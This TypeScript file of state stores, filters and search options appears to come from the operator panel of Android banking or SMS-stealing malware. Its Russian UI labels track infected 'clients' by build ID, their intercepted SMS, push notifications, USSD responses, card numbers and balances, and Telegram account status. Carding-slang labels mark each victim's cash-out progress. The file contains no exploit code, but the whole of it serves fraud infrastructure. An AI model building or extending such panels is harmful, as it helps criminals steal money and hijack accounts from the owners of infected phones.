import {
	clientPassesPhoneCountryExclusion,
	formatExcludePhoneCountriesChipLabel,
	type PhoneCountryCode,
} from '@crave/config/phone-country';
import { createEvent, createStore, sample } from 'effector';
import type { DeviceLogType } from './device-log-type-meta';
import { $resetAuth } from './profile-entity';

export type { PhoneCountryCode };

export type OnlineStatusFilter = 'all' | 'online' | 'offline';
export type ClientsListType = 'clients' | 'balances' | 'cards' | 'phones' | 'messages' | 'pushes' | 'deviceLogs' | 'ussd';
export type TriFilter = 'all' | 'yes' | 'no';
export type SortDir = 'asc' | 'desc';

export type ClientsSearchField =
	| 'id'
	| 'buildId'
	| 'profileNickname'
	| 'sdkVersion'
	| 'phone'
	| 'phoneNumber'
	| 'cardNumber'
	| 'comment'
	| 'takenFrom';

export type BalancesSearchField = 'clientId' | 'buildId' | 'cardNumber' | 'sender' | 'text' | 'comment' | 'cardBalance';
export type CardsSearchField = 'cardNumber' | 'clientId' | 'buildId';
export type PhonesSearchField = 'number' | 'clientId' | 'buildId';
export type MessagesSearchField = 'clientId' | 'buildId' | 'sender' | 'text' | 'comment';
export type PushesSearchField = 'clientId' | 'buildId' | 'packageName' | 'title' | 'text' | 'comment';
export type DeviceLogsSearchField = 'clientId' | 'buildId' | 'message' | 'threadName' | 'stackTrace' | 'comment';
export type UssdSearchField = 'clientId' | 'buildId' | 'operator' | 'usedCommand' | 'response' | 'phone' | 'comment';

export type ClientsSortBy = 'createdAt' | 'onlineAt' | 'maxCardBalance';
export type BalancesSortBy = 'createdAt' | 'cardBalance';
export type CardsSortBy = 'createdAt' | 'cardNumber' | 'balance';
export type PhonesSortBy = 'createdAt' | 'number' | 'maxCardBalance';
export type MessagesSortBy = 'createdAt';
export type PushesSortBy = 'createdAt';
export type DeviceLogsSortBy = 'occurredAt' | 'createdAt';
export type UssdSortBy = 'createdAt';

export interface IClientsFilter {
	onlineStatus: OnlineStatusFilter;
	takeStatus: 'all' | 0 | 1 | 2 | 3;
	tgStatus: 'all' | 'notset' | 'used' | 'woutcode' | '2fa';
	launchStatus: 'all' | 0 | 1 | 2;
	hasPhone: TriFilter;
	excludePhoneCountries: PhoneCountryCode[];
	hasComment: TriFilter;
	hasCards: TriFilter;
	hasBalance: TriFilter;
	deviceLogTypes: DeviceLogType[];
}

export const defaultClientsFilter: IClientsFilter = {
	onlineStatus: 'online',
	takeStatus: 'all',
	tgStatus: 'all',
	launchStatus: 'all',
	hasPhone: 'all',
	excludePhoneCountries: [],
	hasComment: 'all',
	hasCards: 'all',
	hasBalance: 'all',
	deviceLogTypes: [],
};

export const $resetPanelState = createEvent();

export const $setClientsFilter = createEvent<IClientsFilter>();
export const $updateClientsFilter = createEvent<Partial<IClientsFilter>>();

export const $clientsFilter = createStore<IClientsFilter>(defaultClientsFilter)
	.on($setClientsFilter, (_, payload) => payload)
	.on($updateClientsFilter, (state, payload) => ({ ...state, ...payload }))
	.reset($resetPanelState);

export const $setClientsListType = createEvent<ClientsListType>();
export const $clientsListType = createStore<ClientsListType>('clients')
	.on($setClientsListType, (_, payload) => payload)
	.reset($resetPanelState);

export const $setClientsSearchText = createEvent<string>();
export const $clientsSearchText = createStore<string>('').on($setClientsSearchText, (_, payload) => payload).reset($resetPanelState);

export const $setClientsSearchField = createEvent<ClientsSearchField>();
export const $clientsSearchField = createStore<ClientsSearchField>('id')
	.on($setClientsSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setBalancesSearchField = createEvent<BalancesSearchField>();
export const $balancesSearchField = createStore<BalancesSearchField>('clientId')
	.on($setBalancesSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setCardsSearchField = createEvent<CardsSearchField>();
export const $cardsSearchField = createStore<CardsSearchField>('cardNumber')
	.on($setCardsSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setPhonesSearchField = createEvent<PhonesSearchField>();
export const $phonesSearchField = createStore<PhonesSearchField>('number')
	.on($setPhonesSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setMessagesSearchField = createEvent<MessagesSearchField>();
export const $messagesSearchField = createStore<MessagesSearchField>('sender')
	.on($setMessagesSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setPushesSearchField = createEvent<PushesSearchField>();
export const $pushesSearchField = createStore<PushesSearchField>('packageName')
	.on($setPushesSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setDeviceLogsSearchField = createEvent<DeviceLogsSearchField>();
export const $deviceLogsSearchField = createStore<DeviceLogsSearchField>('message')
	.on($setDeviceLogsSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setUssdSearchField = createEvent<UssdSearchField>();
export const $ussdSearchField = createStore<UssdSearchField>('operator')
	.on($setUssdSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setClientsSortBy = createEvent<ClientsSortBy>();
export const $clientsSortBy = createStore<ClientsSortBy>('createdAt').on($setClientsSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setBalancesSortBy = createEvent<BalancesSortBy>();
export const $balancesSortBy = createStore<BalancesSortBy>('createdAt').on($setBalancesSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setCardsSortBy = createEvent<CardsSortBy>();
export const $cardsSortBy = createStore<CardsSortBy>('createdAt').on($setCardsSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setPhonesSortBy = createEvent<PhonesSortBy>();
export const $phonesSortBy = createStore<PhonesSortBy>('createdAt').on($setPhonesSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setMessagesSortBy = createEvent<MessagesSortBy>();
export const $messagesSortBy = createStore<MessagesSortBy>('createdAt').on($setMessagesSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setPushesSortBy = createEvent<PushesSortBy>();
export const $pushesSortBy = createStore<PushesSortBy>('createdAt').on($setPushesSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setDeviceLogsSortBy = createEvent<DeviceLogsSortBy>();
export const $deviceLogsSortBy = createStore<DeviceLogsSortBy>('occurredAt')
	.on($setDeviceLogsSortBy, (_, payload) => payload)
	.reset($resetPanelState);

export const $setUssdSortBy = createEvent<UssdSortBy>();
export const $ussdSortBy = createStore<UssdSortBy>('createdAt').on($setUssdSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setClientsSortDir = createEvent<SortDir>();
export const $clientsSortDir = createStore<SortDir>('desc').on($setClientsSortDir, (_, payload) => payload).reset($resetPanelState);

export const $setClientsListScrollTop = createEvent<number>();
export const $clientsListScrollTop = createStore<number>(0).on($setClientsListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setBalancesListScrollTop = createEvent<number>();
export const $balancesListScrollTop = createStore<number>(0).on($setBalancesListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setCardsListScrollTop = createEvent<number>();
export const $cardsListScrollTop = createStore<number>(0).on($setCardsListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setPhonesListScrollTop = createEvent<number>();
export const $phonesListScrollTop = createStore<number>(0).on($setPhonesListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setMessagesListScrollTop = createEvent<number>();
export const $messagesListScrollTop = createStore<number>(0).on($setMessagesListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setPushesListScrollTop = createEvent<number>();
export const $pushesListScrollTop = createStore<number>(0).on($setPushesListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setDeviceLogsListScrollTop = createEvent<number>();
export const $deviceLogsListScrollTop = createStore<number>(0).on($setDeviceLogsListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setUssdListScrollTop = createEvent<number>();
export const $ussdListScrollTop = createStore<number>(0).on($setUssdListScrollTop, (_, payload) => payload).reset($resetPanelState);

export type ClientsListRestoreIntent = {
	listType: ClientsListType;
	clientId: string;
	itemId?: string | number;
};

export const $setClientsListRestoreIntent = createEvent<ClientsListRestoreIntent>();
export const $clearClientsListRestoreIntent = createEvent();
export const $clientsListRestoreIntent = createStore<ClientsListRestoreIntent | null>(null)
	.on($setClientsListRestoreIntent, (_, payload) => payload)
	.reset($clearClientsListRestoreIntent)
	.reset($resetPanelState);

export const $setClientsFetchKey = createEvent<string>();
export const $clientsFetchKey = createStore<string>('').on($setClientsFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setBalancesFetchKey = createEvent<string>();
export const $balancesFetchKey = createStore<string>('').on($setBalancesFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setCardsFetchKey = createEvent<string>();
export const $cardsFetchKey = createStore<string>('').on($setCardsFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setPhonesFetchKey = createEvent<string>();
export const $phonesFetchKey = createStore<string>('').on($setPhonesFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setMessagesFetchKey = createEvent<string>();
export const $messagesFetchKey = createStore<string>('').on($setMessagesFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setPushesFetchKey = createEvent<string>();
export const $pushesFetchKey = createStore<string>('').on($setPushesFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setDeviceLogsFetchKey = createEvent<string>();
export const $deviceLogsFetchKey = createStore<string>('').on($setDeviceLogsFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setUssdFetchKey = createEvent<string>();
export const $ussdFetchKey = createStore<string>('').on($setUssdFetchKey, (_, payload) => payload).reset($resetPanelState);

sample({
	clock: $resetAuth,
	target: $resetPanelState,
});

sample({
	clock: $setClientsListType,
	fn: () => '',
	target: $setClientsSearchText,
});

export function onlineStatusToIsOnline(onlineStatus: OnlineStatusFilter): boolean | undefined {
	if (onlineStatus === 'online') return true;
	if (onlineStatus === 'offline') return false;
	return undefined;
}

export function countActiveClientsFilters(filter: IClientsFilter, schema: 'client' | 'balance' | 'card' | 'phone' | 'message' | 'push' | 'deviceLog' | 'ussd' = 'client'): number {
	let count = 0;
	if (filter.takeStatus !== 'all') count++;
	if (schema === 'client') {
		if (filter.tgStatus !== 'all') count++;
		if (filter.hasPhone !== 'all') count++;
		if (filter.excludePhoneCountries.length > 0) count++;
		if (filter.hasComment !== 'all') count++;
		if (filter.hasCards !== 'all') count++;
	}
	if (schema === 'balance' || schema === 'message' || schema === 'push' || schema === 'deviceLog' || schema === 'ussd') {
		if (filter.hasPhone !== 'all') count++;
		if (filter.excludePhoneCountries.length > 0) count++;
	}
	if (schema === 'deviceLog' && filter.deviceLogTypes.length > 0) count++;
	if (schema === 'phone') {
		if (filter.excludePhoneCountries.length > 0) count++;
		if (filter.hasBalance !== 'all') count++;
		if (filter.hasCards !== 'all') count++;
	}
	if (schema === 'card') {
		if (filter.hasBalance !== 'all') count++;
		if (filter.hasPhone !== 'all') count++;
		if (filter.excludePhoneCountries.length > 0) count++;
	}
	return count;
}

export type ActiveFilterChip = { key: keyof IClientsFilter; label: string };

function pushExcludePhoneCountriesChip(chips: ActiveFilterChip[], filter: IClientsFilter) {
	if (filter.excludePhoneCountries.length > 0) {
		chips.push({
			key: 'excludePhoneCountries',
			label: formatExcludePhoneCountriesChipLabel(filter.excludePhoneCountries),
		});
	}
}

export function getActiveFilterChips(filter: IClientsFilter, schema: 'client' | 'balance' | 'card' | 'phone' | 'message' | 'push' | 'deviceLog' | 'ussd'): ActiveFilterChip[] {
	const chips: ActiveFilterChip[] = [];
	const takeLabels: Record<number, string> = { 0: 'Не вбит', 1: 'На вбиве', 2: 'Успешно', 3: 'Говно' };
	const tgLabels: Record<string, string> = { notset: 'Не исп.', used: 'Использован', woutcode: 'Нет кода', '2fa': '2FA' };

	if (filter.takeStatus !== 'all') {
		chips.push({ key: 'takeStatus', label: `Вбив: ${takeLabels[filter.takeStatus]}` });
	}

	if (schema === 'client') {
		if (filter.tgStatus !== 'all') chips.push({ key: 'tgStatus', label: `TG: ${tgLabels[filter.tgStatus]}` });
		if (filter.hasPhone !== 'all') chips.push({ key: 'hasPhone', label: filter.hasPhone === 'yes' ? 'Есть телефон' : 'Без телефона' });
		pushExcludePhoneCountriesChip(chips, filter);
		if (filter.hasComment !== 'all') chips.push({ key: 'hasComment', label: filter.hasComment === 'yes' ? 'С коммент.' : 'Без коммент.' });
		if (filter.hasCards !== 'all') chips.push({ key: 'hasCards', label: filter.hasCards === 'yes' ? 'С картами' : 'Без карт' });
	}

	if (schema === 'balance' || schema === 'message' || schema === 'push' || schema === 'deviceLog' || schema === 'ussd') {
		if (filter.hasPhone !== 'all') chips.push({ key: 'hasPhone', label: filter.hasPhone === 'yes' ? 'Есть номера' : 'Без номеров' });
		pushExcludePhoneCountriesChip(chips, filter);
	}

	if (schema === 'deviceLog' && filter.deviceLogTypes.length > 0) {
		chips.push({ key: 'deviceLogTypes', label: `Тип: ${filter.deviceLogTypes.length}` });
	}

	if (schema === 'phone') {
		pushExcludePhoneCountriesChip(chips, filter);
		if (filter.hasBalance !== 'all') chips.push({ key: 'hasBalance', label: filter.hasBalance === 'yes' ? 'С балансом' : 'Без баланса' });
		if (filter.hasCards !== 'all') chips.push({ key: 'hasCards', label: filter.hasCards === 'yes' ? 'С картами' : 'Без карт' });
	}

	if (schema === 'card') {
		if (filter.hasBalance !== 'all') chips.push({ key: 'hasBalance', label: filter.hasBalance === 'yes' ? 'С балансом' : 'Без баланса' });
		if (filter.hasPhone !== 'all') chips.push({ key: 'hasPhone', label: filter.hasPhone === 'yes' ? 'Есть номера' : 'Без номеров' });
		pushExcludePhoneCountriesChip(chips, filter);
	}

	return chips;
}

export function clearFilterKey(key: keyof IClientsFilter): Partial<IClientsFilter> {
	switch (key) {
		case 'takeStatus':
			return { takeStatus: 'all' };
		case 'tgStatus':
			return { tgStatus: 'all' };
		case 'launchStatus':
			return { launchStatus: 'all' };
		case 'hasPhone':
			return { hasPhone: 'all' };
		case 'excludePhoneCountries':
			return { excludePhoneCountries: [] };
		case 'hasComment':
			return { hasComment: 'all' };
		case 'hasCards':
			return { hasCards: 'all' };
		case 'hasBalance':
			return { hasBalance: 'all' };
		case 'deviceLogTypes':
			return { deviceLogTypes: [] };
		default:
			return {};
	}
}

function phoneCountryToServer(filter: IClientsFilter) {
	return {
		excludePhoneCountries: filter.excludePhoneCountries.length ? filter.excludePhoneCountries : undefined,
	};
}

export type FeedListRealtimeFields = {
	takeStatus?: 0 | 1 | 2 | 3;
	takenFrom?: string;
	comment?: string;
	isOnline?: boolean;
	hasPhone?: boolean;
	phoneCountryCodes?: readonly PhoneCountryCode[];
	hasUnclassifiedNonEmptyPhone?: boolean;
};

function passesPhoneCountryListFilters(filter: IClientsFilter, row: FeedListRealtimeFields): boolean {
	if (!filter.excludePhoneCountries.length) return true;
	if (row.phoneCountryCodes === undefined) return true;
	const hasSubject =
		row.hasPhone === true || (row.phoneCountryCodes?.length ?? 0) > 0;
	return clientPassesPhoneCountryExclusion(
		filter.excludePhoneCountries,
		row.phoneCountryCodes,
		hasSubject,
		row.hasUnclassifiedNonEmptyPhone,
	);
}

function passesCommonCursorListFilters(
	filter: IClientsFilter,
	row: FeedListRealtimeFields,
	serverFilters: { takeStatus?: 0 | 1 | 2 | 3; hasPhone?: 'yes' | 'no' },
): boolean {
	if (serverFilters.takeStatus !== undefined && row.takeStatus !== serverFilters.takeStatus) return false;

	const onlineFilter = onlineStatusToIsOnline(filter.onlineStatus);
	if (onlineFilter !== undefined && row.isOnline !== undefined && row.isOnline !== onlineFilter) {
		return false;
	}
	if (serverFilters.hasPhone === 'yes' && row.hasPhone === false) return false;
	if (serverFilters.hasPhone === 'no' && row.hasPhone === true) return false;

	return passesPhoneCountryListFilters(filter, row);
}

function matchesSearchQuery(q: string, value: string | undefined): boolean {
	if (!q) return true;
	return (value ?? '').toLowerCase().includes(q);
}

export function toServerClientsFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		tgStatus: filter.tgStatus === 'all' ? undefined : filter.tgStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		...phoneCountryToServer(filter),
		hasComment: filter.hasComment === 'all' ? undefined : filter.hasComment,
		hasCards: filter.hasCards === 'all' ? undefined : filter.hasCards,
	};
}

export function toServerBalancesFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		...phoneCountryToServer(filter),
	};
}

export function toServerPhonesFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		...phoneCountryToServer(filter),
		hasBalance: filter.hasBalance === 'all' ? undefined : filter.hasBalance,
		hasCards: filter.hasCards === 'all' ? undefined : filter.hasCards,
	};
}

export function toServerMessagesFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		...phoneCountryToServer(filter),
	};
}

export function toServerPushesFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		...phoneCountryToServer(filter),
	};
}

export function toServerDeviceLogsFilters(filter: IClientsFilter) {
	return {
		logTypes: filter.deviceLogTypes.length ? filter.deviceLogTypes : undefined,
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		...phoneCountryToServer(filter),
	};
}

export function deviceLogMatchesGlobalListFilter(
	deviceLog: {
		logType: DeviceLogType;
		message: string;
		threadName?: string | null;
		stackTrace?: string | null;
		clientId: string;
		buildId?: string;
		comment?: string;
		takeStatus?: 0 | 1 | 2 | 3;
		isOnline?: boolean;
		hasPhone?: boolean;
		phoneCountryCodes?: PhoneCountryCode[];
		hasUnclassifiedNonEmptyPhone?: boolean;
	},
	filter: IClientsFilter,
	searchText: string,
	searchField: DeviceLogsSearchField,
): boolean {
	const serverFilters = toServerDeviceLogsFilters(filter);
	if (serverFilters.logTypes?.length && !serverFilters.logTypes.includes(deviceLog.logType)) return false;
	if (serverFilters.takeStatus !== undefined && deviceLog.takeStatus !== serverFilters.takeStatus) return false;

	const onlineFilter = onlineStatusToIsOnline(filter.onlineStatus);
	if (onlineFilter !== undefined && deviceLog.isOnline !== undefined && deviceLog.isOnline !== onlineFilter) {
		return false;
	}
	if (serverFilters.hasPhone === 'yes' && deviceLog.hasPhone === false) return false;
	if (serverFilters.hasPhone === 'no' && deviceLog.hasPhone === true) return false;
	if (!passesPhoneCountryListFilters(filter, deviceLog)) return false;

	const q = searchText.trim().toLowerCase();
	if (!q) return true;

	const fields: Record<DeviceLogsSearchField, string | undefined> = {
		clientId: deviceLog.clientId,
		buildId: deviceLog.buildId,
		message: deviceLog.message,
		threadName: deviceLog.threadName ?? undefined,
		stackTrace: deviceLog.stackTrace ?? undefined,
		comment: deviceLog.comment,
	};
	return matchesSearchQuery(q, fields[searchField]);
}

export function pushMatchesGlobalListFilter(
	push: {
		clientId: string;
		buildId?: string;
		packageName: string;
		title: string;
		text: string;
		comment?: string;
	} & FeedListRealtimeFields,
	filter: IClientsFilter,
	searchText: string,
	searchField: PushesSearchField,
): boolean {
	const serverFilters = toServerPushesFilters(filter);
	if (!passesCommonCursorListFilters(filter, push, serverFilters)) return false;

	const q = searchText.trim().toLowerCase();
	if (!q) return true;

	const fields: Record<PushesSearchField, string | undefined> = {
		clientId: push.clientId,
		buildId: push.buildId,
		packageName: push.packageName,
		title: push.title,
		text: push.text,
		comment: push.comment,
	};
	return matchesSearchQuery(q, fields[searchField]);
}

export function messageMatchesGlobalListFilter(
	message: {
		clientId: string;
		buildId?: string;
		sender: string;
		text: string;
		comment?: string;
	} & FeedListRealtimeFields,
	filter: IClientsFilter,
	searchText: string,
	searchField: MessagesSearchField,
): boolean {
	const serverFilters = toServerMessagesFilters(filter);
	if (!passesCommonCursorListFilters(filter, message, serverFilters)) return false;

	const q = searchText.trim().toLowerCase();
	if (!q) return true;

	const fields: Record<MessagesSearchField, string | undefined> = {
		clientId: message.clientId,
		buildId: message.buildId,
		sender: message.sender,
		text: message.text,
		comment: message.comment,
	};
	return matchesSearchQuery(q, fields[searchField]);
}

export function ussdMatchesGlobalListFilter(
	ussd: {
		clientId: string;
		buildId?: string;
		operator?: string | null;
		usedCommand?: string | null;
		response?: string | null;
		phone?: string | null;
		comment?: string;
	} & FeedListRealtimeFields,
	filter: IClientsFilter,
	searchText: string,
	searchField: UssdSearchField,
): boolean {
	const serverFilters = toServerUssdFilters(filter);
	if (!passesCommonCursorListFilters(filter, ussd, serverFilters)) return false;

	const q = searchText.trim().toLowerCase();
	if (!q) return true;

	const fields: Record<UssdSearchField, string | undefined> = {
		clientId: ussd.clientId,
		buildId: ussd.buildId,
		operator: ussd.operator ?? undefined,
		usedCommand: ussd.usedCommand ?? undefined,
		response: ussd.response ?? undefined,
		phone: ussd.phone ?? undefined,
		comment: ussd.comment,
	};
	return matchesSearchQuery(q, fields[searchField]);
}

export function balanceMatchesGlobalListFilter(
	balance: {
		clientId: string;
		buildId?: string;
		sender: string;
		text: string;
		comment?: string;
		cardNumber?: string;
		cardBalance?: number;
	} & FeedListRealtimeFields,
	filter: IClientsFilter,
	searchText: string,
	searchField: BalancesSearchField,
): boolean {
	const serverFilters = toServerBalancesFilters(filter);
	if (!passesCommonCursorListFilters(filter, balance, serverFilters)) return false;

	const q = searchText.trim().toLowerCase();
	if (!q) return true;

	const fields: Record<BalancesSearchField, string | undefined> = {
		clientId: balance.clientId,
		buildId: balance.buildId,
		sender: balance.sender,
		text: balance.text,
		comment: balance.comment,
		cardNumber: balance.cardNumber,
		cardBalance: balance.cardBalance != null ? String(balance.cardBalance) : undefined,
	};
	return matchesSearchQuery(q, fields[searchField]);
}

export function clientDeviceLogMatchesFilter(
	log: {
		logType: string;
		message: string;
		threadName?: string | null;
		stackTrace?: string | null;
	},
	selectedTypes: DeviceLogType[],
	searchText: string,
): boolean {
	if (selectedTypes.length > 0 && !selectedTypes.includes(log.logType as DeviceLogType)) return false;

	const q = searchText.trim().toLowerCase();
	if (!q) return true;

	return (
		log.message.toLowerCase().includes(q) ||
		(log.threadName?.toLowerCase().includes(q) ?? false) ||
		(log.stackTrace?.toLowerCase().includes(q) ?? false) ||
		log.logType.toLowerCase().includes(q)
	);
}

export function toServerUssdFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		...phoneCountryToServer(filter),
	};
}

export function toServerCardsFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasBalance: filter.hasBalance === 'all' ? undefined : filter.hasBalance,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		...phoneCountryToServer(filter),
	};
}

export const CLIENTS_SEARCH_FIELD_OPTIONS: { value: ClientsSearchField; label: string }[] = [
	{ value: 'id', label: 'ID' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'profileNickname', label: 'Ник' },
	{ value: 'sdkVersion', label: 'SDK' },
	{ value: 'phone', label: 'Телефон (client)' },
	{ value: 'phoneNumber', label: 'Номер SIM' },
	{ value: 'cardNumber', label: 'Карта' },
	{ value: 'comment', label: 'Комментарий' },
	{ value: 'takenFrom', label: 'Взял' },
];

export const BALANCES_SEARCH_FIELD_OPTIONS: { value: BalancesSearchField; label: string }[] = [
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'cardNumber', label: 'Карта' },
	{ value: 'sender', label: 'Отправитель' },
	{ value: 'text', label: 'Текст' },
	{ value: 'comment', label: 'Комментарий' },
	{ value: 'cardBalance', label: 'Баланс' },
];

export const CLIENTS_SORT_OPTIONS: { value: ClientsSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'onlineAt', label: 'Ласт пинг' },
	{ value: 'maxCardBalance', label: 'Баланс карт' },
];

export const BALANCES_SORT_OPTIONS: { value: BalancesSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'cardBalance', label: 'Баланс' },
];

export const CARDS_SEARCH_FIELD_OPTIONS: { value: CardsSearchField; label: string }[] = [
	{ value: 'cardNumber', label: 'Номер карты' },
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
];

export const CARDS_SORT_OPTIONS: { value: CardsSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'cardNumber', label: 'Номер' },
	{ value: 'balance', label: 'Баланс' },
];

export const MESSAGES_SEARCH_FIELD_OPTIONS: { value: MessagesSearchField; label: string }[] = [
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'sender', label: 'Отправитель' },
	{ value: 'text', label: 'Текст' },
	{ value: 'comment', label: 'Комментарий' },
];

export const MESSAGES_SORT_OPTIONS: { value: MessagesSortBy; label: string }[] = [{ value: 'createdAt', label: 'Создан' }];

export const PUSHES_SEARCH_FIELD_OPTIONS: { value: PushesSearchField; label: string }[] = [
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'packageName', label: 'Пакет' },
	{ value: 'title', label: 'Заголовок' },
	{ value: 'text', label: 'Текст' },
	{ value: 'comment', label: 'Комментарий' },
];

export const PUSHES_SORT_OPTIONS: { value: PushesSortBy; label: string }[] = [{ value: 'createdAt', label: 'Создан' }];

export const DEVICE_LOGS_SEARCH_FIELD_OPTIONS: { value: DeviceLogsSearchField; label: string }[] = [
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'message', label: 'Сообщение' },
	{ value: 'threadName', label: 'Поток' },
	{ value: 'stackTrace', label: 'Stack trace' },
	{ value: 'comment', label: 'Комментарий' },
];

export const DEVICE_LOGS_SORT_OPTIONS: { value: DeviceLogsSortBy; label: string }[] = [
	{ value: 'occurredAt', label: 'На устройстве' },
	{ value: 'createdAt', label: 'На сервере' },
];

export const USSD_SEARCH_FIELD_OPTIONS: { value: UssdSearchField; label: string }[] = [
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'operator', label: 'Оператор' },
	{ value: 'usedCommand', label: 'Команда' },
	{ value: 'response', label: 'Ответ' },
	{ value: 'phone', label: 'Номер' },
	{ value: 'comment', label: 'Комментарий' },
];

export const USSD_SORT_OPTIONS: { value: UssdSortBy; label: string }[] = [{ value: 'createdAt', label: 'Создан' }];

export const PHONES_SEARCH_FIELD_OPTIONS: { value: PhonesSearchField; label: string }[] = [
	{ value: 'number', label: 'Номер' },
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
];

export const PHONES_SORT_OPTIONS: { value: PhonesSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'number', label: 'Номер' },
	{ value: 'maxCardBalance', label: 'Баланс карт' },
];
